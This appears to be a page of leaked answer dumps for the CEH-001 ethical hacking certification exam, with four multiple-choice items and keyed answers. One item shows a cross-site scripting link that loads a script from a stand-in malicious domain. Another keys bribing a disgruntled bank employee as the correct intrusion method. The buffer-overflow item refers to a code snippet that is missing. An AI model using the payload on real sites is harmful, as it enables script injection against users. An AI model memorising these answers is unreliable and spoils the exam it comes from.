Free CEH-001 Exam Braindumps (page: 49)


How does a denial-of-service attack work?

  A. A hacker prevents a legitimate user (or group of users) from accessing a service
  B. A hacker uses every character, word, or letter he or she can think of to defeat authentication
  C. A hacker tries to decipher a password by using a system, which subsequently crashes the network
  D. A hacker attempts to imitate a legitimate user by confusing a computer or even another person

Answer(s): A



You are trying to break into a highly classified top-secret mainframe computer with the highest security system in place at Merclyn Barley Bank, located in Los Angeles. You know that conventional hacking doesn't work in this case, because organizations such as banks are generally tight and secure when it comes to protecting their systems. In other words, you are trying to penetrate an otherwise impenetrable system. How would you proceed?

  A. Look for "zero-day" exploits at various underground hacker websites in Russia and China and buy the necessary exploits from these hackers and target the bank's network
  B. Try to hang around the local pubs or restaurants near the bank, get talking to a poorly-paid or disgruntled employee, and offer them money if they'll abuse their access privileges by providing you with sensitive information
  C. Launch DDoS attacks against Merclyn Barley Bank's routers and firewall systems using 100,000 or more "zombies" and "bots"
  D. Try to conduct a Man-in-the-Middle (MiTM) attack and divert the network traffic going to Merclyn Barley Bank's web server to that of your machine using DNS cache poisoning techniques

Answer(s): B



This is an attack that takes advantage of a website vulnerability in which the site displays content that includes unsanitized user-provided data.

<a href="http://foobar.com/index.html?id=%3Cscript%20src=%22http://baddomain.com/badscript.js%22%3E%3C/script%3E">See foobar</a>

What is this attack?

  A. Cross-site-scripting attack
  B. SQL Injection
  C. URL Traversal attack
  D. Buffer Overflow attack

Answer(s): A



Buffer X in an Accounting application module for Brownies Inc. can contain 200 characters. The programmer makes an assumption that 200 characters are more than enough. Because no proper boundary checks were being conducted, Bob decided to insert 400 characters into the 200-character buffer, which overflows the buffer. Below is the code snippet:



How can you protect/fix the problem of your application as shown above?

  A. Because the counter starts with 0, we would stop when the counter is less than 200
  B. Because the counter starts with 0, we would stop when the counter is more than 200
  C. Add a separate statement to signify that if we have written less than 200 characters to the buffer, the stack should stop because it cannot hold any more data
  D. Add a separate statement to signify that if we have written 200 characters to the buffer, the stack should stop because it cannot hold any more data

Answer(s): A,D





